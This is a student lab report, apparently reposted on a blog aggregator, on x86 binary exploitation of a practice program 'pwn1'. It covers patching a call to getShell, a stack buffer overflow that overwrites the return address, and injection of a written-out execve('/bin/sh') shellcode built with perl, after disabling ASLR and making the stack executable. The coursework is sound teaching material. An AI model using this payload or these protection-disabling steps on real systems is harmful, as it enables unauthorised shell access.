当前位置: 首页 > news >正文

20232319 2025-2026-1 《网络与系统攻防技术》实验一实验报告

1.实验内容

  • 篡改程序流程——直接修改可执行文件,跳转至getShell;
  • 栈溢出攻击——利用foo函数的缓冲区溢出漏洞,覆盖返回地址触发getShell;
  • Shellcode注入——构造恶意输入注入自定义Shellcode并执行。

2.实验过程

一、掌握NOP,JNE,JE,JMP,CMP汇编指令的机器码

  • NOP​​ 0x90 空操作指令,CPU不执行任何操作
  • ​​JNE​​ 0x75 不相等时跳转(ZF=0)
  • ​​JE​​ 0x74 相等时跳转(ZF=1)
  • ​​JMP​​ 0xEB(短跳) 0xE9(近跳) 无条件跳转指令
  • ​​CMP​​ 无固定值 比较指令,设置标志位

二、具体实验过程

(1)直接修改程序机器指令,改变程序执行流程

输入反汇编命令
objdump -d pwn1 | more

查看pwn文件
找到e8d7,编辑pwn文件,修改call指令的目标地址,保存后退出

修改pwn

修改成功后查看call指令是否调用getshell函数。发现成功调用

修改成功‘

运行代码,成功启动shell

启动shell

(2)通过构造输入参数,造成BOF攻击,改变程序执行流

了解程序基本功能

屏幕截图 2025-10-09 223025

确认输入字符串哪几个字符会覆盖到返回地址

屏幕截图 2025-10-09 223958(1)

确认字节序之后,构造输入字符串并检查
使用16进制查看指令xxd查看input文件的内容

测试地址

运行文件,成功!

成功

(3)注入Shellcode并执行

注入前的系统设置

execstack -s pwn1    //设置堆栈可执行
execstack -q pwn1    //查询文件的堆栈是否可执行
X pwn1
root@KaliYL:~# more /proc/sys/kernel/randomize_va_space 
2
echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
more /proc/sys/kernel/randomize_va_space 
0

测试前的设置

使用gdb调试,寻找pwn文件的对应进程,图中显示进程号为32675

寻找进程

构造shellcode
perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode
进行注入测试,发现0x01020304,即可锁定shellcode的位置
0xffffd33c + 4 = 0xffffd340

定位shellcode

构造perl -e 'print "A" x 32;print "\x40\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
随后注入,成功运行shell
(cat input_shellcode;cat) | ./pwn20232319
bof成功

3.问题及解决方案

  • 问题1:gdb输入c命令后无响应
  • 问题1解决方案:需要在另一个终端上按回车,程序才能继续执行

4.学习感悟、思考等

通过本次实验,我认识到了机器指令是小端序、使用补码表示的。
通过本次实验的三个任务,分别是直接修改程序机器指令、构造输入参数造成BOF攻击、注入Shellcode,使我对x86指令有了进一步的认识,同时也了解bof攻击的流程。此外,shellcode注入的难度相较于前两个更高,经过学习后也体会到了每一个步骤的作用。

参考资料

  • MAL_逆向与Bof基础
http://www.hskmm.com/?act=detail&tid=28086

相关文章:

  • 2025 年兽药厂家最新推荐榜:级企业技术专利与服务能力全景解析,养殖户选品权威指南
  • 2025 最新隔音板源头厂家口碑推荐榜:阻尼 / 聚酯纤维等全品类适配,资深企业与新锐品牌精选聚酯纤维/墙面/降噪/玻镁/顶部隔音板厂家推荐
  • Google play 内部测试流程
  • 软工第三次作业
  • 全球化部署几种方案
  • 基于MATLAB的路面裂缝检测识别
  • HDU6794:Tokitsukaze and Multiple
  • 当下环境通缩分析
  • 使用qt读取系统字体库,并进行英文名称映射
  • gitlab配置aws的s3作为docker镜像的存储
  • 阿克曼函数
  • 10.10
  • shell脚本监控ssl证书到期时间
  • AI如何通过卫星图像识别刺猬栖息地
  • rust 模块和引用
  • moectf2025-reverse-wp
  • 国标GB28181网页直播平台EasyGBS如何构建智慧社区一体化视频监控方案?
  • TypeScript Declaration Merging(声明合并)使用说明
  • 第七章 手写数字识别V5
  • 关于根据距离列表排序sql
  • 2025年高适配铝型材厂家推荐:深圳市方达铝业领衔,3家企业覆盖多场景
  • 注册c模块到lua中使用
  • DNA权威书籍
  • 220V转5V500mA非隔离电源芯片WT5105
  • linux基础-find查找
  • 220V转12V电机水泵供电驱动WT5105
  • 禁止或启用键盘修改输入法
  • ansys安装时无法修改安装路径--灰色无法修改
  • Qwen2.5-VL技术报告
  • 攸米知识付费小程序管理系统:一站式知识变现解决方案